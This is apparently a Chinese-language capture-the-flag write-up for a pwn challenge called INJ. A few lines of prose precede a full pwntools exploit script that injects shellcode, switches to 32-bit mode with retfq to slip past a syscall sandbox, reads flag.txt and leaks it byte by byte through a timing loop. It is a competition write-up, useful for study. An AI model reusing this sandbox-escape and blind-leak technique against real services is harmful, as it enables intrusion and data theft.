上去看的时候队里的其他师傅已经把PWN写的只剩一题了,然后就半摆烂地把PWN最后那道INJ写了,最后也是被队里的大佬们带飞拿了第一

1st place!

INJ

题目的沙箱

利用shellcode切换至32位进行ORB,需要注意的是远程open返回的文件描述符可能不是3,需要用 mov ebx, eax 来设置read的fd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#!/usr/bin/python2
from pwn import *

context.binary = 'inj'

sd          = lambda x          : io.send(x)
sa          = lambda a, b       : io.sendafter(a, b)

def pwn(ch):
    global io
    global flag
    # io = process('./inj')
    io = remote('35.233.85.116', 30020)
    code = '''
    mov al, 0xa
    mov edi, 0x0000000000404000
    mov esi, edi
    push 7
    pop rdx
    syscall
    pop rdx
    mov esp, 0x00000000004043E0
    pop rax
    push 0x80cd
    mov ecx, esp
    push 0x23
    push rcx
    add al, 3
    retfq
    '''
    code = asm(code)
    # raw_input()
    sa('Welcome to my code executor!', code)
    code = '''
    mov eax, 5
    push 0
    push 0x7478742e
    push 0x67616c66
    mov ebx, esp
    mov ecx, 0
    int 0x80
    mov ebx, eax
    mov eax, 3
    mov ecx, 0x00000000004045E0
    mov edx, 0x50
    int 0x80
    push 0x33
    push 0x404418
    retfq
    loop:
    mov rsi, 0x4045e0
    cmp byte ptr[rsi+{0}], {1}
    je loop
    ret
    '''.format(len(flag), ord(ch))
    code = 'aa' + asm(code)
    # raw_input()
    sleep(1)
    sd(code)
    try:
        io.recv(timeout = 1)
        flag += ch
        io.close()
        return True
    except:
        io.close()
        return False

flag = ''
table = 'abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890{}-_@$&*!?.'
while True:
    if flag.endswith('}'):
        break
    for ch in table:
        sleep(0.25)
        info('current flag: ' + flag)
        info('trying(' + ch + ')')
        if pwn(ch):
            success('success(' + ch + ')')
            break
success('final flag: ' + flag)